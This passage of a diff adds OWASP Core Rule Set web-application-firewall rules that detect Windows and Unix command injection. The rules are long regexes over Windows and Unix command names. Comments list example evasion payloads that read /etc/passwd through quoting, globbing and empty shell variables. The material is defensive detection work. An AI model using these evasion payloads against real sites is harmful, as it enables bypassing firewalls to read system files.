*g)[\"\^]*e[\"\^]*r)|w[\"\^]*(?:a[\"\^]*b|(?:f|m[\"\^]*i)[\"\^]*c|i[\"\^]*n[\"\^]*(?:g[\"\^]*e[\"\^]*t|r[\"\^]*m|w[\"\^]*o[\"\^]*r[\"\^]*d)|l[\"\^]*r[\"\^]*m[\"\^]*d[\"\^]*r|o[\"\^]*r[\"\^]*k[\"\^]*f[\"\^]*o[\"\^]*l[\"\^]*d[\"\^]*e[\"\^]*r[\"\^]*s|s[\"\^]*(?:(?:c[\"\^]*r[\"\^]*i[\"\^]*p|r[\"\^]*e[\"\^]*s[\"\^]*e)[\"\^]*t|l)|t[\"\^]*[\s\v,\.-/;-<>].*|u[\"\^]*a[\"\^]*u[\"\^]*c[\"\^]*l[\"\^]*t)|x[\"\^]*w[\"\^]*i[\"\^]*z[\"\^]*a[\"\^]*r[\"\^]*d|z[\"\^]*i[\"\^]*p[\"\^]*f[\"\^]*l[\"\^]*d[\"\^]*r)(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \ + "id:932370,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Windows Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# This rule detects Windows shell command injections. +# If you are not running Windows, it is safe to disable this rule. +# +# New in CRSv4: The rules 932110 and 932115 were reorganized and renumbered to 932370 and 932380. +# The new rules target specific Windows binaries to simplify future updates of the command list. +# +# See rule 932370 above for further explanation. +# +# This rule is case-insensitive. +# +# Regular expression generated from regex-assembly/932380.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932380 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:[\n\r;`\{]|\|\|?|&&?)[\s\v]*[\s\v\"'-\(,@]*(?:[\"'\.-9A-Z_a-z]+/|(?:[\"'\x5c\^]*[0-9A-Z_a-z][\"'\x5c\^]*:.*|[ \"'\.-9A-Z\x5c\^-_a-z]*)\x5c)?[\"\^]*(?:a[\"\^]*(?:s[\"\^]*s[\"\^]*o[\"\^]*c|t[\"\^]*(?:m[\"\^]*a[\"\^]*d[\"\^]*m|t[\"\^]*r[\"\^]*i[\"\^]*b)|u[\"\^]*(?:d[\"\^]*i[\"\^]*t[\"\^]*p[\"\^]*o[\"\^]*l|t[\"\^]*o[\"\^]*(?:c[\"\^]*(?:h[\"\^]*k|o[\"\^]*n[\"\^]*v)|(?:f[\"\^]*m|m[\"\^]*o[\"\^]*u[\"\^]*n)[\"\^]*t)))|b[\"\^]*(?:c[\"\^]*d[\"\^]*(?:b[\"\^]*o[\"\^]*o|e[\"\^]*d[\"\^]*i)[\"\^]*t|(?:d[\"\^]*e[\"\^]*h[\"\^]*d|o[\"\^]*o[\"\^]*t)[\"\^]*c[\"\^]*f[\"\^]*g|i[\"\^]*t[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|c[\"\^]*(?:a[\"\^]*c[\"\^]*l[\"\^]*s|e[\"\^]*r[\"\^]*t[\"\^]*(?:r[\"\^]*e[\"\^]*q|u[\"\^]*t[\"\^]*i[\"\^]*l)|h[\"\^]*(?:c[\"\^]*p|d[\"\^]*i[\"\^]*r|g[\"\^]*(?:l[\"\^]*o[\"\^]*g[\"\^]*o[\"\^]*n|p[\"\^]*o[\"\^]*r[\"\^]*t|u[\"\^]*s[\"\^]*r)|k[\"\^]*(?:d[\"\^]*s[\"\^]*k|n[\"\^]*t[\"\^]*f[\"\^]*s))|l[\"\^]*e[\"\^]*a[\"\^]*n[\"\^]*m[\"\^]*g[\"\^]*r|m[\"\^]*(?:d(?:[\"\^]*k[\"\^]*e[\"\^]*y)?|s[\"\^]*t[\"\^]*p)|s[\"\^]*c[\"\^]*r[\"\^]*i[\"\^]*p[\"\^]*t)|d[\"\^]*(?:c[\"\^]*(?:d[\"\^]*i[\"\^]*a[\"\^]*g|g[\"\^]*p[\"\^]*o[\"\^]*f[\"\^]*i[\"\^]*x)|e[\"\^]*(?:f[\"\^]*r[\"\^]*a[\"\^]*g|l)|f[\"\^]*s[\"\^]*(?:d[\"\^]*i[\"\^]*a|r[\"\^]*m[\"\^]*i)[\"\^]*g|i[\"\^]*(?:a[\"\^]*n[\"\^]*t[\"\^]*z|r|s[\"\^]*(?:k[\"\^]*(?:c[\"\^]*o[\"\^]*(?:m[\"\^]*p|p[\"\^]*y)|p[\"\^]*(?:a[\"\^]*r[\"\^]*t|e[\"\^]*r[\"\^]*f)|r[\"\^]*a[\"\^]*i[\"\^]*d|s[\"\^]*h[\"\^]*a[\"\^]*d[\"\^]*o[\"\^]*w)|p[\"\^]*d[\"\^]*i[\"\^]*a[\"\^]*g))|n[\"\^]*s[\"\^]*c[\"\^]*m[\"\^]*d|(?:o[\"\^]*s[\"\^]*k[\"\^]*e|r[\"\^]*i[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*r)[\"\^]*y)|e[\"\^]*(?:n[\"\^]*d[\"\^]*l[\"\^]*o[\"\^]*c[\
"\^]*a[\"\^]*l|v[\"\^]*e[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*r[\"\^]*e[\"\^]*a[\"\^]*t[\"\^]*e)|E[\"\^]*v[\"\^]*n[\"\^]*t[\"\^]*c[\"\^]*m[\"\^]*d|f[\"\^]*(?:c|i[\"\^]*(?:l[\"\^]*e[\"\^]*s[\"\^]*y[\"\^]*s[\"\^]*t[\"\^]*e[\"\^]*m[\"\^]*s|n[\"\^]*d[\"\^]*s[\"\^]*t[\"\^]*r)|l[\"\^]*a[\"\^]*t[\"\^]*t[\"\^]*e[\"\^]*m[\"\^]*p|o[\"\^]*r(?:[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)?|r[\"\^]*e[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*s[\"\^]*k|s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|(?:t[\"\^]*y[\"\^]*p|v[\"\^]*e[\"\^]*u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t)[\"\^]*e)|g[\"\^]*(?:e[\"\^]*t[\"\^]*(?:m[\"\^]*a[\"\^]*c|t[\"\^]*y[\"\^]*p[\"\^]*e)|o[\"\^]*t[\"\^]*o|p[\"\^]*(?:f[\"\^]*i[\"\^]*x[\"\^]*u[\"\^]*p|(?:r[\"\^]*e[\"\^]*s[\"\^]*u[\"\^]*l[\"\^]*)?t|u[\"\^]*p[\"\^]*d[\"\^]*a[\"\^]*t[\"\^]*e)|r[\"\^]*a[\"\^]*f[\"\^]*t[\"\^]*a[\"\^]*b[\"\^]*l)|h[\"\^]*(?:e[\"\^]*l[\"\^]*p[\"\^]*c[\"\^]*t[\"\^]*r|o[\"\^]*s[\"\^]*t[\"\^]*n[\"\^]*a[\"\^]*m[\"\^]*e)|i[\"\^]*(?:c[\"\^]*a[\"\^]*c[\"\^]*l[\"\^]*s|f|p[\"\^]*(?:c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*g|x[\"\^]*r[\"\^]*o[\"\^]*u[\"\^]*t[\"\^]*e)|r[\"\^]*f[\"\^]*t[\"\^]*p)|j[\"\^]*e[\"\^]*t[\"\^]*p[\"\^]*a[\"\^]*c[\"\^]*k|k[\"\^]*(?:l[\"\^]*i[\"\^]*s[\"\^]*t|s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p|t[\"\^]*(?:m[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|p[\"\^]*a[\"\^]*s[\"\^]*s))|l[\"\^]*(?:o[\"\^]*(?:d[\"\^]*c[\"\^]*t[\"\^]*r|g[\"\^]*(?:m[\"\^]*a[\"\^]*n|o[\"\^]*f[\"\^]*f))|p[\"\^]*[q-r])|m[\"\^]*(?:a[\"\^]*(?:c[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e|k[\"\^]*e[\"\^]*c[\"\^]*a[\"\^]*b|p[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|k[\"\^]*(?:d[\"\^]*i[\"\^]*r|l[\"\^]*i[\"\^]*n[\"\^]*k)|m[\"\^]*c|o[\"\^]*u[\"\^]*n[\"\^]*t[\"\^]*v[\"\^]*o[\"\^]*l|q[\"\^]*(?:b[\"\^]*k[\"\^]*u[\"\^]*p|(?:t[\"\^]*g[\"\^]*)?s[\"\^]*v[\"\^]*c)|s[\"\^]*(?:d[\"\^]*t|i[\"\^]*(?:e[\"\^]*x[\"\^]*e[\"\^]*c|n[\"\^]*f[\"\^]*o[\"\^]*3[\"\^]*2)|t[\"\^]*s[\"\^]*c))|n[\"\^]*(?:b[\"\^]*t[\"\^]*s[\"\^]*t[\"\^]*a[\"\^]*t|e[\"\^]*t[\"\^]*(?:c[\"\^]*f[\"\^]*g|d[\"\^]*o[\"\^]*m|s[\"\^]*(?:h|t[\"\^]*a[\"\^]*t))|f[\"\^]*s[\"\^]*(?:a[\"\^]
*d[\"\^]*m[\"\^]*i[\"\^]*n|s[\"\^]*(?:h[\"\^]*a[\"\^]*r[\"\^]*e|t[\"\^]*a[\"\^]*t))|l[\"\^]*(?:b[\"\^]*m[\"\^]*g[\"\^]*r|t[\"\^]*e[\"\^]*s[\"\^]*t)|s[\"\^]*l[\"\^]*o[\"\^]*o[\"\^]*k[\"\^]*u[\"\^]*p|t[\"\^]*(?:b[\"\^]*a[\"\^]*c[\"\^]*k[\"\^]*u[\"\^]*p|c[\"\^]*m[\"\^]*d[\"\^]*p[\"\^]*r[\"\^]*o[\"\^]*m[\"\^]*p[\"\^]*t|f[\"\^]*r[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*l))|o[\"\^]*(?:f[\"\^]*f[\"\^]*l[\"\^]*i[\"\^]*n[\"\^]*e|p[\"\^]*e[\"\^]*n[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*s)|p[\"\^]*(?:a[\"\^]*(?:g[\"\^]*e[\"\^]*f[\"\^]*i[\"\^]*l[\"\^]*e[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*f[\"\^]*i|t[\"\^]*h[\"\^]*p[\"\^]*i[\"\^]*n)[\"\^]*g|(?:b[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i|k[\"\^]*t[\"\^]*m[\"\^]*o)[\"\^]*n|e[\"\^]*(?:n[\"\^]*t[\"\^]*n[\"\^]*t|r[\"\^]*f[\"\^]*m[\"\^]*o[\"\^]*n)|n[\"\^]*p[\"\^]*u[\"\^]*(?:n[\"\^]*a[\"\^]*t[\"\^]*t[\"\^]*e[\"\^]*n[\"\^]*d|t[\"\^]*i[\"\^]*l)|o[\"\^]*(?:p[\"\^]*d|w[\"\^]*e[\"\^]*r[\"\^]*s[\"\^]*h[\"\^]*e[\"\^]*l[\"\^]*l)|r[\"\^]*n[\"\^]*(?:c[\"\^]*n[\"\^]*f[\"\^]*g|(?:d[\"\^]*r[\"\^]*v|m[\"\^]*n[\"\^]*g)[\"\^]*r|j[\"\^]*o[\"\^]*b[\"\^]*s|p[\"\^]*o[\"\^]*r[\"\^]*t|q[\"\^]*c[\"\^]*t[\"\^]*l)|u[\"\^]*(?:b[\"\^]*p[\"\^]*r[\"\^]*n|s[\"\^]*h[\"\^]*(?:d|p[\"\^]*r[\"\^]*i[\"\^]*n[\"\^]*t[\"\^]*e[\"\^]*r[\"\^]*c[\"\^]*o[\"\^]*n[\"\^]*n[\"\^]*e[\"\^]*c[\"\^]*t[\"\^]*i[\"\^]*o[\"\^]*n[\"\^]*s))|w[\"\^]*(?:l[\"\^]*a[\"\^]*u[\"\^]*n[\"\^]*c[\"\^]*h[\"\^]*e[\"\^]*r|s[\"\^]*h))|q[\"\^]*(?:a[\"\^]*p[\"\^]*p[\"\^]*s[\"\^]*r[\"\^]*v|p[\"\^]*r[\"\^]*o[\"\^]*c[\"\^]*e[\"\^]*s[\"\^]*s|u[\"\^]*s[\"\^]*e[\"\^]*r|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a)|r[\"\^]*(?:d(?:[\"\^]*p[\"\^]*s[\"\^]*i[\"\^]*g[\"\^]*n)?|e[\"\^]*(?:f[\"\^]*s[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|g(?:[\"\^]*(?:i[\"\^]*n[\"\^]*i|s[\"\^]*v[\"\^]*r[\"\^]*3[\"\^]*2))?|l[\"\^]*o[\"\^]*g|(?:(?:p[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i|s[\"\^]*c[\"\^]*a)[\"\^]*)?n|x[\"\^]*e[\"\^]*c)|i[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u[\"\^]*p|m[\"\^]*d[\"\^]*i[\"\^]*r|o[\"\^]*b[\"\^]*o[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y|p[\"\^]*c[\"\^]*(?:i[\"\^]*n[\"\^
]*f[\"\^]*o|p[\"\^]*i[\"\^]*n[\"\^]*g)|s[\"\^]*h|u[\"\^]*n[\"\^]*d[\"\^]*l[\"\^]*l[\"\^]*3[\"\^]*2|w[\"\^]*i[\"\^]*n[\"\^]*s[\"\^]*t[\"\^]*a)|s[\"\^]*(?:a[\"\^]*n|c[\"\^]*(?:h[\"\^]*t[\"\^]*a[\"\^]*s[\"\^]*k[\"\^]*s|w[\"\^]*c[\"\^]*m[\"\^]*d)|e[\"\^]*(?:c[\"\^]*e[\"\^]*d[\"\^]*i[\"\^]*t|r[\"\^]*v[\"\^]*e[\"\^]*r[\"\^]*(?:(?:c[\"\^]*e[\"\^]*i[\"\^]*p|w[\"\^]*e[\"\^]*r)[\"\^]*o[\"\^]*p[\"\^]*t[\"\^]*i[\"\^]*n|m[\"\^]*a[\"\^]*n[\"\^]*a[\"\^]*g[\"\^]*e[\"\^]*r[\"\^]*c[\"\^]*m[\"\^]*d)|t[\"\^]*x)|f[\"\^]*c|(?:h[\"\^]*o[\"\^]*w[\"\^]*m[\"\^]*o[\"\^]*u[\"\^]*n|u[\"\^]*b[\"\^]*s)[\"\^]*t|x[\"\^]*s[\"\^]*t[\"\^]*r[\"\^]*a[\"\^]*c[\"\^]*e|y[\"\^]*s[\"\^]*(?:o[\"\^]*c[\"\^]*m[\"\^]*g[\"\^]*r|t[\"\^]*e[\"\^]*m[\"\^]*i[\"\^]*n[\"\^]*f[\"\^]*o))|t[\"\^]*(?:a[\"\^]*(?:k[\"\^]*e[\"\^]*o[\"\^]*w[\"\^]*n|p[\"\^]*i[\"\^]*c[\"\^]*f[\"\^]*g|s[\"\^]*k[\"\^]*(?:k[\"\^]*i[\"\^]*l[\"\^]*l|l[\"\^]*i[\"\^]*s[\"\^]*t))|(?:c[\"\^]*m[\"\^]*s[\"\^]*e[\"\^]*t[\"\^]*u|f[\"\^]*t)[\"\^]*p|(?:(?:e[\"\^]*l[\"\^]*n[\"\^]*e|i[\"\^]*m[\"\^]*e[\"\^]*o[\"\^]*u)[\"\^]*|r[\"\^]*a[\"\^]*c[\"\^]*e[\"\^]*r[\"\^]*(?:p[\"\^]*)?)t|l[\"\^]*n[\"\^]*t[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*n|p[\"\^]*m[\"\^]*(?:t[\"\^]*o[\"\^]*o[\"\^]*l|v[\"\^]*s[\"\^]*c[\"\^]*m[\"\^]*g[\"\^]*r)|s[\"\^]*(?:(?:d[\"\^]*i[\"\^]*s[\"\^]*)?c[\"\^]*o[\"\^]*n|e[\"\^]*c[\"\^]*i[\"\^]*m[\"\^]*p|k[\"\^]*i[\"\^]*l[\"\^]*l|p[\"\^]*r[\"\^]*o[\"\^]*f)|y[\"\^]*p[\"\^]*e[\"\^]*p[\"\^]*e[\"\^]*r[\"\^]*f|z[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l)|u[\"\^]*n[\"\^]*(?:e[\"\^]*x[\"\^]*p[\"\^]*o[\"\^]*s[\"\^]*e|i[\"\^]*q[\"\^]*u[\"\^]*e[\"\^]*i[\"\^]*d|l[\"\^]*o[\"\^]*d[\"\^]*c[\"\^]*t[\"\^]*r)|v[\"\^]*(?:o[\"\^]*l|s[\"\^]*s[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n)|w[\"\^]*(?:a[\"\^]*i[\"\^]*t[\"\^]*f[\"\^]*o[\"\^]*r|b[\"\^]*a[\"\^]*d[\"\^]*m[\"\^]*i[\"\^]*n|(?:d[\"\^]*s|e[\"\^]*(?:c|v[\"\^]*t))[\"\^]*u[\"\^]*t[\"\^]*i[\"\^]*l|h[\"\^]*(?:e[\"\^]*r[\"\^]*e|o[\"\^]*a[\"\^]*m[\"\^]*i)|i[\"\^]*n[\"\^]*(?:n[\"\^]*t(?:[\"\^]*3[\"\^]*2)?|r[\"\^]*s)|m[\"\^]*i[\"\^]*c|s[\"\^]*c[\"\^]
*r[\"\^]*i[\"\^]*p[\"\^]*t)|x[\"\^]*c[\"\^]*o[\"\^]*p[\"\^]*y)(?:\.[\"\^]*[0-9A-Z_a-z]+)?\b" \ + "id:932380,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Windows Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-windows',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932013,phase:1,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:932014,phase:2,pass,nolog,skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# [ Unix command injection ] +# +# This rule targets pefix + the source command (dot character) at PL2. 
+# +# Rule relations: +# +# .932230 (base rule, PL1, targets prefix + two and three character commands) +# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command) +# ..932232 (stricter sibling, PL3, targets prefix + additional command words) +# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion) +# +# .932250 (base rule, PL1, targets two and three character commands) +# .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# +# .932240 (generic detection, PL2, targets generic evasion attempts) +# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, +# - with and without prefix +# - words of any length) +# ..932239 (sibling of 932236, PL2, +# - with and without prefix +# - words of any length +# - targets request headers user-agent and referer only +# - excluded words: known user-agents) +# ..932238 (stricter sibling of 932236, PL3, +# - no excluded words) +# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3, +# - targets request headers user-agent and referer only +# - without prefix +# - with word boundaries +# - words of any length +# - excluded words: known user-agents) +# +# +# Regular expression generated from regex-assembly/932231.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932231 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a
-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*\.[\s\v].*\b" \ + "id:932231,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Unix Command Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# This is a stricter sibling of rule 932130. +# +# It applies the same regular expression to the +# User-Agent and Referer HTTP headers. +# +# Unlike the sibling rule, this rule runs in phase 1. +# +# Regular expression generated from regex-assembly/932131.ra. 
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932131
+#
+SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer "@rx \$(?:\((?:.*|\(.*\))\)|\{.*\})|[<>]\(.*\)|/[0-9A-Z_a-z]*\[!?.+\]" \
+ "id:932131,\
+ phase:1,\
+ block,\
+ capture,\
+ t:none,t:cmdLine,\
+ msg:'Remote Command Execution: Unix Shell Expression Found',\
+ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
+
+#
+# -=[ Rule 932200 ]=-
+#
+# Block RCE Bypass using different techniques:
+# - uninitialized variables (https://www.secjuice.com/web-application-firewall-waf-evasion/)
+# - string concatenations (https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
+# - globbing patterns (https://medium.com/secjuice/waf-evasion-techniques-718026d693d8)
+#
+# Examples:
+# - foo;cat$u+/etc$u/passwd
+# - bar;cd+/etc;/bin$u/ca*+passwd
+# - foo;ca\t+/et\c/pa\s\swd
+# - foo;c'at'+/etc/pa's'swd
+# - foo;c$@at+/et$@c/pas$@swd
+# - foo;c$!at+/et$!c/pas$!swd
+# - foo;c$*at+/et$*c/pas$*swd
+# - foo;c$?at+/et$?c/pas$?swd
+# - foo;c$-at+/et$-c/pas$-swd
+# - foo;c$_at+/et$_c/pas$_swd
+# - foo;c$$at+/et$$c/pas$$swd
+#
+# Regex notes: https://regex101.com/r/V6wrCO/1
+#
+# Regular expression generated from regex-assembly/932200.ra.
+# To update the regular expression run the following shell script
+# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
+# crs-toolchain regex update 932200
+#
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ['\*\?\x5c`][^\n/]+/|/[^/]+?['\*\?\x5c`]|\$[!#-\$\(\*\-0-9\?-\[_a-\{]" \
+ "id:932200,\
+ phase:2,\
+ block,\
+ capture,\
+ t:none,t:lowercase,t:urlDecodeUni,\
+ msg:'RCE Bypass Technique',\
+ logdata:'Matched Data: %{TX.0} found within %{TX.932200_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
+ tag:'application-multi',\
+ tag:'language-multi',\
+ tag:'platform-multi',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/2',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
